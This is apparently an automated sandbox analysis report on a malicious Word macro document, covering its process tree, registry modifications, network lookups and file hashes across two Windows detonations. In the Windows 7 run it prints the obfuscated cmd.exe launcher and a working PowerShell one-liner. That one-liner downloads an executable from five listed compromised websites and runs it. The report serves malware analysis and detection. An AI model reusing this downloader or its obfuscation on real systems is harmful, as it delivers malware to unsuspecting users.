Analysis Overview
SHA256
6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc
Threat Level: Known bad
The file 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Suspicious Office macro
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-27 09:08
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-27 09:08
Reported: 2024-05-27 09:11
Platform: win7-20240221-en
Max time kernel: 117s
Max time network: 123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
|---|---|---|---|
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baominhonline.com | udp |
| US | 8.8.8.8:53 | craquesdoradio.com.br | udp |
| US | 8.8.8.8:53 | csubiz.us | udp |
| US | 8.8.8.8:53 | ccoolmedia.com | udp |
| US | 8.8.8.8:53 | casellamoving.com | udp |
| US | 76.223.105.230:80 | casellamoving.com | tcp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
Files
memory/1664-0-0x000000002F0F1000-0x000000002F0F2000-memory.dmp
memory/1664-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1664-2-0x000000007173D000-0x0000000071748000-memory.dmp
memory/1664-6-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-41-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-7-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-84-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-151-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-1740-0x000000007173D000-0x0000000071748000-memory.dmp
memory/1664-1741-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-1742-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-1743-0x0000000006320000-0x0000000006420000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | b05bb4e3da3053b7db3ee1ee22959dae |
| SHA1 | 9e50fac8322bb847c27f7089c5203ec5896225b3 |
| SHA256 | 1aef690de2f600d07971f3545dc4a05e1f8a9fc004e8106dd51d32076d629c19 |
| SHA512 | 17685061c444012d0ff7a725418cce4cfeca59ac5a590340fa2945e3b0b6036159f4e342b54b4e0d6729932ef87c9a4b15f379a3a756f84baf9569aac73006ea |
memory/1664-1758-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1664-1759-0x000000007173D000-0x0000000071748000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 09:08
Reported
2024-05-27 09:11
Platform
win10v2004-20240508-en
Max time kernel
134s
Max time network
131s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
